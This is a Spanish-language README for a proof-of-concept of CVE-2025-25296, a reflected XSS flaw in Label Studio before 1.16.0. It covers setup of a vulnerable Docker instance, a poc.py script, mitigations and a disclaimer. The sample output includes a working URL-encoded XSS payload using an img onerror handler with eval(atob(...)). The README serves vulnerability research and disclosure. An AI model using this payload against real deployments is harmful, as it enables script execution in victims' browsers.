
Prueba de concepto (POC) para la vulnerabilidad CVE-2025-25296 que afecta a las versiones de Label Studio anteriores a la 1.16.0
Este proyecto demuestra una prueba de concepto (POC) para la vulnerabilidad CVE-2025-25296 que afecta a Label Studio, una herramienta de etiquetado de datos de código abierto. La vulnerabilidad reside en el endpoint /projects/upload-example, que no sanitiza el contenido HTML proporcionado por el usuario en las solicitudes GET. Esto permite a los atacantes ejecutar JavaScript arbitrario en el navegador de la víctima, lo que puede dar lugar a ataques de Cross-Site Scripting (XSS).
/projects/upload-example de Label Studio1.16.0 o posterior de Label StudioComo solución temporal:
/projects/upload-example con solicitudes GET.pip usando setup.sh)poc.py: Script de Python para explotar la vulnerabilidad y demostrar el ataque XSS.setup.sh: Script para configurar el entorno vulnerable mediante Docker.Clone este repositorio:
git clone CVE-2025-25296-POC
cd CVE-2025-25296-POC
Ejecute el script de configuración:
chmod +x setup.sh
./setup.sh
El script de configuración realizará lo siguiente:
1.15.0).localhost:8080.Ejecute el script de explotación:
python poc.py
El script realizará lo siguiente:
/projects/upload-example.Abra la URL proporcionada en un navegador web para observar la alerta XSS activada por el payload.
[*] Attempting to send XSS payload...
[+] Payload successfully sent!
[+] Check this URL in a browser: http://localhost:8080/projects/upload-example/?label_config=%3CView%3E%3C!--%20%7B%22data%22%3A%20%7B%22text%22%3A%20%22%3Cdiv%3E%3Cimg%20src%3Dx%20onerror%3Deval(atob(%60YWxlcnQoIlhTUyIp%60))%3E%3C/div%3E%22%7D%7D%20--%3E%3CHyperText%20name%3D%22text%22%20value%3D%22%24text%22/%3E%3C/View%3E
Para mitigar esta vulnerabilidad:
1.16.0 o posterior.Este proyecto está destinado únicamente a fines educativos y de investigación. Úselo de manera responsable y solo en sistemas donde tenga permiso explícito. El uso no autorizado de esta herramienta puede violar las leyes aplicables.